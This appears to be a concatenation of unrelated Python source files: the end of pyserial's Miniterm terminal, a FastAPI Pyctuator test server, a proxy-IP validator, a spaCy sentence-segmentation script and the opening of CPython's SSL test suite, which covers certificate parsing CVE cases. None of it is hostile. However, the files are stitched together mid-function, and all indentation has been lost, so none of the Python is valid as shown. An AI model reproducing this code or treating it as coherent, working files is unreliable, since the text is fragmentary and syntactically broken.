sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
# noport given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
fast_api_test_server.py
|
import logging
import threading
import time
from typing import Optional
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import Response
from uvicorn.config import Config
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer, CustomServer
class FastApiPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = FastAPI(
title="FastAPI Example Server",
description="Demonstrate Spring Boot Admin Integration with FastAPI",
docs_url="/api",
)
self.pyctuator = Pyctuator(
self.app,
"FastAPI Pyctuator",
"http://localhost:8000",
"http://localhost:8000/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
)
@self.app.get("/logfile_test_repeater", tags=["pyctuator"])
# pylint: disable=unused-variable
def logfile_test_repeater(repeated_string: str) -> str:
logging.error(repeated_string)
return repeated_string
self.server = CustomServer(config=(Config(app=self.app, loop="asyncio")))
self.thread = threading.Thread(target=self.server.run)
@self.app.get("/httptrace_test_url")
# pylint: disable=unused-variable
def get_httptrace_test_url(request: Request, sleep_sec: Optional[int]) -> Response:
# Sleep if requested to sleep - used for asserting httptraces timing
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(sleep_sec)
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
return Response(headers={"resp-data": str(request.headers.get("User-Data"))}, content="my content")
def start(self) -> None:
self.thread.start()
while not self.server.started:
time.sleep(0.01)
def stop(self) -> None:
logging.info("Stopping FastAPI server")
self.pyctuator.stop()
# Allow the recurring registration to complete any in-progress request before stopping FastAPI
time.sleep(1)
self.server.should_exit = True
self.server.force_exit = True
self.thread.join()
logging.info("FastAPI server stopped")
def atexit(self) -> None:
if self.pyctuator.boot_admin_registration_handler:
self.pyctuator.boot_admin_registration_handler.deregister_from_admin_server()
|
validate.py
|
# -*- coding:utf-8 -*-
import threading
from app.mongo_model.ip import ip
from app.validate.request_web import request_web
class validate(object):
def run(self):
while(True):
_lists = ip().lists(10)
_threads = []
for _i in _lists:
_http_type = 'http' if _i.get('type') == 'ALL' else _i.get('type').lower()
_t = threading.Thread(target=request_web().run, args=(_http_type, _i.get('ip'), _i.get('port')))
_threads.append(_t)
for t in _threads:
t.start()
for t in _threads:
t.join()
|
sent_segmentation_multiProcessing.py
|
import multiprocessing
import spacy
from spacy.lang.en import English
import pickle
def worker(i, return_dict):
"""worker function"""
with open("../data/processed/Ensemble_splits/Ensemble_split{}.txt".format(i),"r") as file:
trunk=file.read()
return_dict[i] =[str(sent)+"\n" for sent in list(nlp(trunk))]
with open("../data/processed/Ensemble_splits/Ensemble_split{}.txt".format(i+5),"r") as file:
trunk=file.read()
return_dict[i] =[str(sent)+"\n" for sent in list(nlp(trunk))]
with open("../data/processed/Ensemble_splits/Ensemble_split{}.txt".format(i+10),"r") as file:
trunk=file.read()
return_dict[i] =[str(sent)+"\n" for sent in list(nlp(trunk))]
with open("../data/processed/Ensemble_splits/Ensemble_split{}.txt".format(i+15),"r") as file:
trunk=file.read()
return_dict[i] =[str(sent)+"\n" for sent in list(nlp(trunk))]
nlp = English() # just the language with no model
sentencizer = nlp.create_pipe("sentencizer")
nlp.add_pipe(sentencizer)
nlp.max_length=2**30
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
#6 split+6 process, 占用200G;单线程每1/20 split需要6分钟,6*20/60=2hour, 2hour/6=20mins
for i in range(5):
p = multiprocessing.Process(target=worker, args=(i, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
with open("sent_segmentation.pkl", "wb") as f:
pickle.dump(return_dict, f)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', '[email protected]'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', '[email protected]'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.SSL_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'{protocol!r} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!r} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
